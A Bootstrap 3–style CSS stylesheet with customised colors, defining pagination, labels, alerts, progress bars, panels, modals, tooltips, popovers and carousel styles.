.pagination > li:first-child > a,
.pagination > li:first-child > span {
margin-left: 0;
border-bottom-left-radius: 4px;
border-top-left-radius: 4px;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
border-top-right-radius: 4px;
border-bottom-right-radius: 4px;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
background-color: #eeeeee;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
z-index: 2;
color: #ffffff;
cursor: default;
background-color: #FfFfFf;
border-color: #FfFfFf;
}
.pagination > .disabled > span,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
color: #999999;
cursor: not-allowed;
background-color: #ffffff;
border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
padding: 10px 16px;
font-size: 18px;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
border-bottom-left-radius: 6px;
border-top-left-radius: 6px;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
border-top-right-radius: 6px;
border-bottom-right-radius: 6px;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
padding: 5px 10px;
font-size: 12px;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
border-bottom-left-radius: 3px;
border-top-left-radius: 3px;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
border-top-right-radius: 3px;
border-bottom-right-radius: 3px;
}
.pager {
padding-left: 0;
margin: 20px 0;
text-align: center;
list-style: none;
}
.pager:before,
.pager:after {
display: table;
content: " ";
}
.pager:after {
clear: both;
}
.pager:before,
.pager:after {
display: table;
content: " ";
}
.pager:after {
clear: both;
}
.pager li {
display: inline;
}
.pager li > a,
.pager li > span {
display: inline-block;
padding: 5px 14px;
background-color: #ffffff;
border: 1px solid #dddddd;
border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
text-decoration: none;
background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
float: right;
}
.pager .previous > a,
.pager .previous > span {
float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
color: #999999;
cursor: not-allowed;
background-color: #ffffff;
}
.label {
display: inline;
padding: .2em .6em .3em;
font-size: 75%;
font-weight: bold;
line-height: 1;
color: #ffffff;
text-align: center;
white-space: nowrap;
vertical-align: baseline;
border-radius: .25em;
}
.label[href]:hover,
.label[href]:focus {
color: #ffffff;
text-decoration: none;
cursor: pointer;
}
.label:empty {
display: none;
}
.label-default {
background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
background-color: #808080;
}
.label-primary {
background-color: #FfFfFf;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
background-color: #3071a9;
}
.label-success {
background-color: #5cb85c;
}
.label-success[href]:hover,
.label-success[href]:focus {
background-color: #449d44;
}
.label-info {
background-color: #5bc0de;
}
.label-info[href]:hover,
.label-info[href]:focus {
background-color: #31b0d5;
}
.label-warning {
background-color: #f0ad4e;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
background-color: #ec971f;
}
.label-danger {
background-color: #d9534f;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
background-color: #c9302c;
}
.badge {
display: inline-block;
min-width: 10px;
padding: 3px 7px;
font-size: 12px;
font-weight: bold;
line-height: 1;
color: #ffffff;
text-align: center;
white-space: nowrap;
vertical-align: baseline;
background-color: #999999;
border-radius: 10px;
}
.badge:empty {
display: none;
}
a.badge:hover,
a.badge:focus {
color: #ffffff;
text-decoration: none;
cursor: pointer;
}
.btn .badge {
position: relative;
top: -1px;
}
a.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
color: #FfFfFf;
background-color: #ffffff;
}
.nav-pills > li > a > .badge {
margin-left: 3px;
}
.center {
text-align:center;
}
.jumbotron {
font-size: 16px;
font-weight: 200;
line-height: 2.1428571435;
color: inherit;
}
.cyan {
background-color: #28a686;
color:white;
}
.gray {
background-color: #333333;
}
.gray2 {
background-color: #999999;
}
.orange {
background-color: #ffb53d;
}
.orange2 {
color:white;
background-color: #ff853d;
}
.brown {
color:white;
background-color: #a66e14;
}
.green{
color:white;
background-color: #55853d;
}
.blue {
color:white;
background-color: #3366A7;
}
.jumbotron h1 {
line-height: 1;
color: inherit;
}
.jumbotron p {
line-height: 1.4;
}
.container .jumbotron {
}
@media screen and (min-width: 768px) {
.jumbotron {
/*padding-bottom: 20px;*/
}
.container .jumbotron {
padding-right: 60px;
padding-left: 60px;
}
.jumbotron h1 {
font-size: 33px;
}
}
.thumbnail {
display: inline-block;
display: block;
height: auto;
max-width: 100%;
padding: 4px;
line-height: 1.428571429;
background-color: #ffffff;
border: 1px solid #dddddd;
border-radius: 4px;
-webkit-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out;
}
.thumbnail > img {
display: block;
height: auto;
max-width: 100%;
}
a.thumbnail:hover,
a.thumbnail:focus {
border-color: #FfFfFf;
}
.thumbnail > img {
margin-right: auto;
margin-left: auto;
}
.thumbnail .caption {
padding: 9px;
color: #333333;
}
.alert {
padding: 15px;
margin-bottom: 20px;
border: 1px solid transparent;
border-radius: 4px;
}
.alert h4 {
margin-top: 0;
color: inherit;
}
.alert .alert-link {
font-weight: bold;
}
.alert > p,
.alert > ul {
margin-bottom: 0;
}
.alert > p + p {
margin-top: 5px;
}
.alert-dismissable {
padding-right: 35px;
}
.alert-dismissable .close {
position: relative;
top: -2px;
right: -21px;
color: inherit;
}
.alert-success {
color: #468847;
background-color: #dff0d8;
border-color: #d6e9c6;
}
.alert-success hr {
border-top-color: #c9e2b3;
}
.alert-success .alert-link {
color: #356635;
}
.alert-info {
color: #3a87ad;
background-color: #d9edf7;
border-color: #bce8f1;
}
.alert-info hr {
border-top-color: #a6e1ec;
}
.alert-info .alert-link {
color: #2d6987;
}
.alert-warning {
color: #c09853;
background-color: #fcf8e3;
border-color: #fbeed5;
}
.alert-warning hr {
border-top-color: #f8e5be;
}
.alert-warning .alert-link {
color: #a47e3c;
}
.alert-danger {
color: #b94a48;
background-color: #f2dede;
border-color: #eed3d7;
}
.alert-danger hr {
border-top-color: #e6c1c7;
}
.alert-danger .alert-link {
color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
from {
background-position: 40px 0;
}
to {
background-position: 0 0;
}
}
@-moz-keyframes progress-bar-stripes {
from {
background-position: 40px 0;
}
to {
background-position: 0 0;
}
}
@-o-keyframes progress-bar-stripes {
from {
background-position: 0 0;
}
to {
background-position: 40px 0;
}
}
@keyframes progress-bar-stripes {
from {
background-position: 40px 0;
}
to {
background-position: 0 0;
}
}
.progress {
height: 20px;
margin-bottom: 20px;
overflow: hidden;
background-color: #f5f5f5;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
float: left;
width: 0;
height: 100%;
font-size: 12px;
color: #ffffff;
text-align: center;
background-color: #FfFfFf;
-webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
-webkit-transition: width 0.6s ease;
transition: width 0.6s ease;
}
.progress-striped .progress-bar {
background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent));
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-size: 40px 40px;
}
.progress.active .progress-bar {
-webkit-animation: progress-bar-stripes 2s linear infinite;
-moz-animation: progress-bar-stripes 2s linear infinite;
-ms-animation: progress-bar-stripes 2s linear infinite;
-o-animation: progress-bar-stripes 2s linear infinite;
animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
background-color: #5cb85c;
}
.progress-striped .progress-bar-success {
background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent));
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
background-color: #5bc0de;
}
.progress-striped .progress-bar-info {
background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent));
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
background-color: #f0ad4e;
}
.progress-striped .progress-bar-warning {
background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent));
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
background-color: #d9534f;
}
.progress-striped .progress-bar-danger {
background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent));
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media,
.media-body {
overflow: hidden;
zoom: 1;
}
.media,
.media .media {
margin-top: 15px;
}
.media:first-child {
margin-top: 0;
}
.media-object {
display: block;
}
.media-heading {
margin: 0 0 5px;
}
.media > .pull-left {
margin-right: 10px;
}
.media > .pull-right {
margin-left: 10px;
}
.media-list {
padding-left: 0;
list-style: none;
}
.list-group {
padding-left: 0;
margin-bottom: 20px;
}
.list-group-item {
position: relative;
display: block;
padding: 10px 15px;
margin-bottom: -1px;
background-color: #ffffff;
border: 1px solid #dddddd;
}
.list-group-item:first-child {
border-top-right-radius: 4px;
border-top-left-radius: 4px;
}
.list-group-item:last-child {
margin-bottom: 0;
border-bottom-right-radius: 4px;
border-bottom-left-radius: 4px;
}
.list-group-item > .badge {
float: right;
}
.list-group-item > .badge + .badge {
margin-right: 5px;
}
a.list-group-item {
color: #555555;
}
a.list-group-item .list-group-item-heading {
color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
text-decoration: none;
background-color: #f5f5f5;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
z-index: 2;
color: #ffffff;
background-color: #FfFfFf;
border-color: #FfFfFf;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading {
color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
color: #e1edf7;
}
.list-group-item-heading {
margin-top: 0;
margin-bottom: 5px;
}
.list-group-item-text {
margin-bottom: 0;
line-height: 1.3;
}
.panel {
margin-bottom: 20px;
background-color: #ffffff;
border: 1px solid transparent;
border-radius: 4px;
-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
padding: 15px;
}
.panel-body:before,
.panel-body:after {
display: table;
content: " ";
}
.panel-body:after {
clear: both;
}
.panel-body:before,
.panel-body:after {
display: table;
content: " ";
}
.panel-body:after {
clear: both;
}
.panel > .list-group {
margin-bottom: 0;
}
.panel > .list-group .list-group-item {
border-width: 1px 0;
}
.panel > .list-group .list-group-item:first-child {
border-top-right-radius: 0;
border-top-left-radius: 0;
}
.panel > .list-group .list-group-item:last-child {
border-bottom: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
border-top-width: 0;
}
.panel > .table {
margin-bottom: 0;
}
.panel > .panel-body + .table {
border-top: 1px solid #dddddd;
}
.panel-heading {
padding: 10px 15px;
border-bottom: 1px solid transparent;
border-top-right-radius: 3px;
border-top-left-radius: 3px;
}
.panel-title {
margin-top: 0;
margin-bottom: 0;
font-size: 16px;
}
.panel-title > a {
color: inherit;
}
.panel-footer {
padding: 10px 15px;
background-color: #f5f5f5;
border-top: 1px solid #dddddd;
border-bottom-right-radius: 3px;
border-bottom-left-radius: 3px;
}
.panel-group .panel {
margin-bottom: 0;
overflow: hidden;
border-radius: 4px;
}
.panel-group .panel + .panel {
margin-top: 5px;
}
.panel-group .panel-heading {
border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse .panel-body {
border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
border-bottom: 1px solid #dddddd;
}
.panel-default {
border-color: #dddddd;
}
.panel-default > .panel-heading {
color: #333333;
background-color: #f5f5f5;
border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse .panel-body {
border-top-color: #dddddd;
}
.panel-default > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #dddddd;
}
.panel-primary {
border-color: #FfFfFf;
}
.panel-primary > .panel-heading {
color: #ffffff;
background-color: #FfFfFf;
border-color: #FfFfFf;
}
.panel-primary > .panel-heading + .panel-collapse .panel-body {
border-top-color: #FfFfFf;
}
.panel-primary > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #FfFfFf;
}
.panel-success {
border-color: #d6e9c6;
}
.panel-success > .panel-heading {
color: #468847;
background-color: #dff0d8;
border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse .panel-body {
border-top-color: #d6e9c6;
}
.panel-success > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #d6e9c6;
}
.panel-warning {
border-color: #fbeed5;
}
.panel-warning > .panel-heading {
color: #c09853;
background-color: #fcf8e3;
border-color: #fbeed5;
}
.panel-warning > .panel-heading + .panel-collapse .panel-body {
border-top-color: #fbeed5;
}
.panel-warning > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #fbeed5;
}
.panel-danger {
border-color: #eed3d7;
}
.panel-danger > .panel-heading {
color: #b94a48;
background-color: #f2dede;
border-color: #eed3d7;
}
.panel-danger > .panel-heading + .panel-collapse .panel-body {
border-top-color: #eed3d7;
}
.panel-danger > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #eed3d7;
}
.panel-info {
border-color: #bce8f1;
}
.panel-info > .panel-heading {
color: #3a87ad;
background-color: #d9edf7;
border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse .panel-body {
border-top-color: #bce8f1;
}
.panel-info > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #bce8f1;
}
.well {
min-height: 20px;
padding: 19px;
margin-bottom: 20px;
background-color: #f5f5f5;
border: 1px solid #e3e3e3;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
border-color: #ddd;
border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
padding: 24px;
border-radius: 6px;
}
.well-sm {
padding: 9px;
border-radius: 3px;
}
.close {
float: right;
font-size: 21px;
font-weight: bold;
line-height: 1;
color: #000000;
text-shadow: 0 1px 0 #ffffff;
opacity: 0.2;
filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
color: #000000;
text-decoration: none;
cursor: pointer;
opacity: 0.5;
filter: alpha(opacity=50);
}
button.close {
padding: 0;
cursor: pointer;
background: transparent;
border: 0;
-webkit-appearance: none;
}
.modal-open {
overflow: hidden;
}
body.modal-open,
.modal-open .navbar-fixed-top,
.modal-open .navbar-fixed-bottom {
margin-right: 15px;
}
.modal {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 1040;
display: none;
overflow: auto;
overflow-y: scroll;
}
.modal.fade .modal-dialog {
-webkit-transform: translate(0, -25%);
-ms-transform: translate(0, -25%);
transform: translate(0, -25%);
-webkit-transition: -webkit-transform 0.3s ease-out;
-moz-transition: -moz-transform 0.3s ease-out;
-o-transition: -o-transform 0.3s ease-out;
transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
-webkit-transform: translate(0, 0);
-ms-transform: translate(0, 0);
transform: translate(0, 0);
}
.modal-dialog {
z-index: 1050;
width: auto;
padding: 10px;
margin-right: auto;
margin-left: auto;
}
.modal-content {
position: relative;
background-color: #ffffff;
border: 1px solid #999999;
border: 1px solid rgba(0, 0, 0, 0.2);
border-radius: 6px;
outline: none;
-webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
background-clip: padding-box;
}
.modal-backdrop {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 1030;
background-color: #000000;
}
.modal-backdrop.fade {
opacity: 0;
filter: alpha(opacity=0);
}
.modal-backdrop.in {
opacity: 0.5;
filter: alpha(opacity=50);
}
.modal-header {
min-height: 16.428571429px;
padding: 15px;
border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
margin-top: -2px;
}
.modal-title {
margin: 0;
line-height: 1.428571429;
}
.modal-body {
position: relative;
padding: 20px;
}
.modal-footer {
padding: 19px 20px 20px;
margin-top: 15px;
text-align: right;
border-top: 1px solid #e5e5e5;
}
.modal-footer:before,
.modal-footer:after {
display: table;
content: " ";
}
.modal-footer:after {
clear: both;
}
.modal-footer:before,
.modal-footer:after {
display: table;
content: " ";
}
.modal-footer:after {
clear: both;
}
.modal-footer .btn + .btn {
margin-bottom: 0;
margin-left: 5px;
}
.modal-footer .btn-group .btn + .btn {
margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
margin-left: 0;
}
@media screen and (min-width: 768px) {
.modal-dialog {
right: auto;
left: 50%;
width: 600px;
padding-top: 30px;
padding-bottom: 30px;
}
.modal-content {
-webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
}
}
.tooltip {
position: absolute;
z-index: 1030;
display: block;
font-size: 12px;
line-height: 1.4;
opacity: 0;
filter: alpha(opacity=0);
visibility: visible;
}
.tooltip.in {
opacity: 0.9;
filter: alpha(opacity=90);
}
.tooltip.top {
padding: 5px 0;
margin-top: -3px;
}
.tooltip.right {
padding: 0 5px;
margin-left: 3px;
}
.tooltip.bottom {
padding: 5px 0;
margin-top: 3px;
}
.tooltip.left {
padding: 0 5px;
margin-left: -3px;
}
.tooltip-inner {
max-width: 200px;
padding: 3px 8px;
color: #ffffff;
text-align: center;
text-decoration: none;
background-color: #000000;
border-radius: 4px;
}
.tooltip-arrow {
position: absolute;
width: 0;
height: 0;
border-color: transparent;
border-style: solid;
}
.tooltip.top .tooltip-arrow {
bottom: 0;
left: 50%;
margin-left: -5px;
border-top-color: #000000;
border-width: 5px 5px 0;
}
.tooltip.top-left .tooltip-arrow {
bottom: 0;
left: 5px;
border-top-color: #000000;
border-width: 5px 5px 0;
}
.tooltip.top-right .tooltip-arrow {
right: 5px;
bottom: 0;
border-top-color: #000000;
border-width: 5px 5px 0;
}
.tooltip.right .tooltip-arrow {
top: 50%;
left: 0;
margin-top: -5px;
border-right-color: #000000;
border-width: 5px 5px 5px 0;
}
.tooltip.left .tooltip-arrow {
top: 50%;
right: 0;
margin-top: -5px;
border-left-color: #000000;
border-width: 5px 0 5px 5px;
}
.tooltip.bottom .tooltip-arrow {
top: 0;
left: 50%;
margin-left: -5px;
border-bottom-color: #000000;
border-width: 0 5px 5px;
}
.tooltip.bottom-left .tooltip-arrow {
top: 0;
left: 5px;
border-bottom-color: #000000;
border-width: 0 5px 5px;
}
.tooltip.bottom-right .tooltip-arrow {
top: 0;
right: 5px;
border-bottom-color: #000000;
border-width: 0 5px 5px;
}
.popover {
position: absolute;
top: 0;
left: 0;
z-index: 1010;
display: none;
max-width: 276px;
padding: 1px;
text-align: left;
white-space: normal;
background-color: #ffffff;
border: 1px solid #cccccc;
border: 1px solid rgba(0, 0, 0, 0.2);
border-radius: 6px;
-webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
background-clip: padding-box;
}
.popover.top {
margin-top: -10px;
}
.popover.right {
margin-left: 10px;
}
.popover.bottom {
margin-top: 10px;
}
.popover.left {
margin-left: -10px;
}
.popover-title {
padding: 8px 14px;
margin: 0;
font-size: 14px;
font-weight: normal;
line-height: 18px;
background-color: #f7f7f7;
border-bottom: 1px solid #ebebeb;
border-radius: 5px 5px 0 0;
}
.popover-content {
padding: 9px 14px;
}
.popover .arrow,
.popover .arrow:after {
position: absolute;
display: block;
width: 0;
height: 0;
border-color: transparent;
border-style: solid;
}
.popover .arrow {
border-width: 11px;
}
.popover .arrow:after {
border-width: 10px;
content: "";
}
.popover.top .arrow {
bottom: -11px;
left: 50%;
margin-left: -11px;
border-top-color: #999999;
border-top-color: rgba(0, 0, 0, 0.25);
border-bottom-width: 0;
}
.popover.top .arrow:after {
bottom: 1px;
margin-left: -10px;
border-top-color: #ffffff;
border-bottom-width: 0;
content: " ";
}
.popover.right .arrow {
top: 50%;
left: -11px;
margin-top: -11px;
border-right-color: #999999;
border-right-color: rgba(0, 0, 0, 0.25);
border-left-width: 0;
}
.popover.right .arrow:after {
bottom: -10px;
left: 1px;
border-right-color: #ffffff;
border-left-width: 0;
content: " ";
}
.popover.bottom .arrow {
top: -11px;
left: 50%;
margin-left: -11px;
border-bottom-color: #999999;
border-bottom-color: rgba(0, 0, 0, 0.25);
border-top-width: 0;
}
.popover.bottom .arrow:after {
top: 1px;
margin-left: -10px;
border-bottom-color: #ffffff;
border-top-width: 0;
content: " ";
}
.popover.left .arrow {
top: 50%;
right: -11px;
margin-top: -11px;
border-left-color: #999999;
border-left-color: rgba(0, 0, 0, 0.25);
border-right-width: 0;
}
.popover.left .arrow:after {
right: 1px;
bottom: -10px;
border-left-color: #ffffff;
border-right-width: 0;
content: " ";
}
.carousel {
position: relative;
}
.carousel-inner {
position: relative;
width: 100%;
overflow: hidden;
}
.carousel-inner > .item {
position: relative;
display: none;
-webkit-transition: 0.6s ease-in-out left;
transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
display: block;
height: auto;
max-width: 100%;
line-height: 1;
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
display: block;
}
.carousel-inner > .active {
left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
position: absolute;
top: 0;
width: 100%;
}
.carousel-inner > .next {
left: 100%;
}
.carousel-inner > .prev {
left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
left: 0;
}
.carousel-inner > .active.left {
left: -100%;
}
.carousel-inner > .active.right {
left: 100%;
}
.carousel-control {
position: absolute;
top: 0;
bottom: 0;
left: 0;
width: 15%;
font-size: 20px;
color: #333333;
text-align: center;
opacity: 0.5;
}
.carousel-control.left {
background-image: -webkit-gradient(linear, 0 top, 100% top, from(rgba(0, 0, 0, 0.5)), to(rgba(0, 0, 0, 0.0001)));
background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.5) 0), color-stop(rgba(0, 0, 0, 0.0001) 100%));
background-image: -moz-linear-gradient(left, rgba(0, 0, 0, 0.5) 0, rgba(0, 0, 0, 0.0001) 100%);
background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0, rgba(0, 0, 0, 0.0001) 100%);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
right: 0;
left: auto;
background-image: -webkit-gradient(linear, 0 top, 100% top, from(rgba(0, 0, 0, 0.0001)), to(rgba(0, 0, 0, 0.5)));
background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.0001) 0), color-stop(rgba(0, 0, 0, 0.5) 100%));
background-image: -moz-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0, rgba(0, 0, 0, 0.5) 100%);
background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0, rgba(0, 0, 0, 0.5) 100%);
background-repeat: repeat-x;
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
color: #ffffff;
text-decoration: none;
opacity: 0.9;
filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
position: absolute;
top: 50%;
left: 50%;
z-index: 5;
display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
width: 20px;
height: 20px;
margin-top: -10px;
margin-left: -10px;
font-family: serif;
}
.carousel-control .icon-prev:before {
content: '\2039';
}
.carousel-control .icon-next:before {
content: '\203a';
}
.carousel-indicators {
position: absolute;
bottom: 0px;
left: 50%;
z-index: 15;
width: 60%;
padding-left: 0;
margin-left: -30%;
text-align: center;
list-style: none;
}
.carousel-indicators li {
display: inline-block;
width: 10px;
height: 10px;
margin: 1px;
text-indent: -999px;
cursor: pointer;
border: 1px solid #ffffff;
border-radius: 10px;
}
.carousel-indicators .active {
width: 12px;
height: 12px;
margin: 0;
background-color: #ffffff;
}
.carousel-caption {
position: absolute;
right: 15%;
bottom: 20px;
left: 15%;
z-index: 10;
padding-top: 20px;
padding-bottom: 20px;
color: #333333;
text-align: center;
}
.carousel-caption a {
color: #333333;
}
.carousel-caption a:hover{
color: #FFFFFF;
}
.carousel-caption .btn {
text-shadow: none;
}
@media screen and (min-width: 768px) {
.carousel-control .icon-prev,
.carousel-control .icon-next {
width: 30px;
height: 30px;
margin-top: -15px;
margin-left: -15px;
font-size: 30px;
}
.carousel-caption {
right: 20%;
left: 20%;
padding-bottom: 30px;
}
.carousel-indicators {
bottom: 0px;
}
}
.clearfix:before,
.clearfix:after {
display: table;
content: " ";
}
.clearfix:after {
clear: both;
}
.pull-right {
float: right !important;
}
.pull-left {
float: left !important;
}
.hide {
display: none !important;
}
.show {
display: block !important;
}
.invisible {
visibility: hidden;
}
.text-hide {
font: 0/0 a;
color: transparent;
text-shadow: none;
background-color: transparent;
border: 0;
}
.affix {
position: fixed;
}
@-ms-viewport {
width: device-width;
}
@media screen and (max-width: 400px) {
@-ms-viewport {
width: 320px;
}
}
.hidden {
display: none !important;
visibility: hidden !important;
}
